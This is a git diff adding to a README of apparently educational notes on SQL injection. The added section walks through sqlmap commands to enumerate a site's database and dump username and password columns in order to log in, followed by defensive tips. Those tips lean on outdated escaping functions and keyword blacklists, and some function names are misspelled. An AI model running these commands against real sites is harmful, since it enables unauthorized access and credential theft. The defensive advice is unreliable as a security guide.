diff --git a/Web_Exploits/SQLi/README.md b/Web_Exploits/SQLi/README.md
index 319e7d9..88d5908 100644
--- a/Web_Exploits/SQLi/README.md
+++ b/Web_Exploits/SQLi/README.md
@@ -1,5 +1,7 @@
 # SQL Injections (SQLi)
 
+![](http://i.imgur.com/AcVJKT2.png)
+
 * A SQL query  search can be easily manipulated and assume that a SQL query search is a reliable command. This means  that SQL searches are capable of passing, unnoticed, by access control mechanisms. 
 * Using methods of diverting standard authentication and by checking the authorization credentials, you can gain access to important information stored in a database. 
 
@@ -94,7 +96,56 @@ $ ./sqlmap.py -u <WEBSITE> --dbs
 (...)
 ```
 
-From this we can verify what databases we have available, for example. From this we can find out how many tables exist, and their respective names. The sqlmap command is ```--tables <DATABASE-NAME>```. 
+#### Gaining access to the Database
 
+* From this we can verify what databases we have available, for example. From this we can find out how many tables exist, and their respective names. The sqlmap command is:
 
+```
+./sqlmap -u <WEBSITE> --tables <DATABASE-NAME>
+``` 
+
+* The main objective is to find  usernames and passwords in order to gain access/login to the site, for example in a table named *users*. The sqlmap command is
+
+```
+./sqlmap -u <WEBSITE> --columns -D <DATABASE-NAME> -T <TABLE-NAME>
+``` 
+
+This will return information about the columns in the given table.
+
+* Now we can dump all the data of all columns using the flag ```-C``` for column names:
+
+```
+./sqlmap -u <WEBSITE> --columns -D <DATABASE-NAME> -T <TABLE-NAME> -C 'id,name,password,login,email' --dump
+```
+
+If the password are clear text (not hashed in md5, etc), we have access to the website.
+
+## Some Protection Tips
+
+* Never connect to a database as a super user or as a root.
+* Sanitize any user input. PHP has several functions that validate functions such as:
+	- is_numeric()
+	- ctype_digit()
+	- settype()
+	- addslahes()
+	- str_replace()
+* Add quotes ```"``` to all non-numeric input values that will be passed to the database by using escape chars functions:
+	- mysql_real_escape_string()
+	- sqlit_escape_string()
+
+```php
+$name = 'John';
+$name = mysql_real_escape_string($name);
+$SQL = "SELECT * FROM users WHERE username='$name'";
+```
+
+* Always perform a parse of data that is received from the user (POST and FORM methods). 
+	- The chars to be checked:```", ', whitespace, ;, =, <, >, !, --, #, //```.
+	- The reserved words: SELECT, INSERT, UPDATE, DELETE, JOIN, WHERE, LEFT, INNER, NOT, IN, LIKE, TRUNCATE, DROP, CREATE, ALTER, DELIMITER.
+
+* Do not display explicit error messages that show the request or a part of the SQL request.
+
+* Erase user accounts that are not used (and default accounts).
+
+* Other tools: blacklists, AMNESIA, Java Static Tainting, Codeigniter.